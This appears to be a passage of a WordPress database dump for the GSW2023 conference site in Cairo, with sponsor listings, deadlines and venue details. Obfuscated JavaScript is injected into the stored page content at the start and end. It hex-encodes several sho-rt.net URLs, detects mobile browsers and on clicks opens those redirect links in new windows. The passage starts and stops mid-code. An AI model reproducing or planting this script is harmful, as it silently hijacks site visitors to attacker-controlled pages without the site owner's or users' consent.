_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:59:58','2023-05-16 01:59:58','',3066,'https://gsw2023.com/?p=4497',0,'revision','',0),
(4498,1,'2023-05-16 02:06:34','2023-05-16 02:06:34','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 